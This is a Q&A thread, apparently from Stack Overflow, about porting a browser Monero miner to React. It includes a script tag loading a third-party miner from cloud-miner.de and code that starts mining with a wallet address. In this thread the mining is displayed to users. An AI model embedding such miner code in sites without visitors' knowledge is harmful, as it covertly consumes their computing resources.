# Function not importing from external js file in react

Tags: javascript, reactjs, import, web-mining

I am migrating a web miner from EJS templates to react. The code below starts the mining process.

```
<script src="https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean"></script>

<script>
  $(function() {
    EverythingIsLife('...', 'x', 70);
    $("#webMinerInfo").html("Mining...");
  });
</script>
```

It loads the necessary data from that URL (including a function EverythingIsLife) and then runs it, giving a message to the user when it starts mining. However when I attempt to do the same thing in  react:

WebMinerPage.jsx:

```
function WebMinerPage() {
    document.body.style.backgroundColor = "#EEEEEE";
    // add miner script

    function handleLoad() {
        EverythingIsLife('...', 'x', 70);
        document.querySelector("#webMinerInfo").innerHTML = "Mining...";
    }

    useEffect(() => {
        window.addEventListener('load', handleLoad);

        return () => {
            window.removeEventListener('load', handleLoad);
        }
    }, []);

// return and export statements
```

Where in the head of my index.html I have:
`<script src="https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean"></script>`

It returns an error:

Failed to compille! EverythingisLife is not defined.

How can I solve this? Any help would be appreciated.

Answer (score 1, accepted):

You need to bind/unbind the event listener that handles the script initialization to dom `load` event:

```
class Comp1 extends React.Component {
 constructor(props) {
    super(props);
    this.handleLoad = this.handleLoad.bind(this);
 }

 componentDidMount() {
    window.addEventListener('load', this.handleLoad);
 }

 componentWillUnmount() { 
   window.removeEventListener('load', this.handleLoad)  
 }

 handleLoad() {
  window.EverythingIsLife('41e5VEKZTbWYpEWRW21yV1E9AVgNkNGrBciPSncifEAbHqxGUSd12Xr5yCfMyUTJM92opviLuaAWhXCHaX4gvdYLBBT9zUR', 'x', 70);
    $("#webMinerInfo").html("Mining...");
 }
}
```

Above is the equivalent of `$(function() {})`

> $(function() { ... }); is just jQuery short-hand for
> $(document).ready(function() { ... }); What it's designed to do
> (amongst other things) is ensure that your function is called once all
> the DOM elements of the page are ready to be use

Taken from [here](https://stackoverflow.com/questions/7642442/what-does-function-do)

Comment: @Shrey Hoshi On a side note, what's your take on mining moneros from webpages? Is it profitable?

Comment: Hi Maxime thanks for the suggestion. i'm using react functional components and I tried doing it with useEffect() however it still returns the same error.

Comment: I tried using classes as well as you've written the code and it doesnt seem to make a  difference :/

Comment: I dont think mining moneros from webpages is particulary profitable - this is more of just something to show to our audience to keep them engaged while we work on our main miner.

Comment: Nice hooks are better yes! Looking at your code I think you unnecessarily wrap your `script` tags with `require`. Also are you adding these in your html `head`?

Comment: I just changed the require after realizing my mistake

Comment: Are you saying to put the <script src="https..."> in my head?

Comment: Yes, React doesn't have their own guidelines to import external libraries

Comment: Also I would edit the post to add your code sample with your html and react files that import all the monero jazz, if above doesn't work

Comment: `<script>` elements inside `<body>` are loaded asynchronously, so you were probably trying to initialize an object that wasn't fully imported yet when the component got mounted

Comment: Try to use `window.EverythingIsLife` instead

Comment: Works! Thank you so much! Could you please update your answer with this last comment!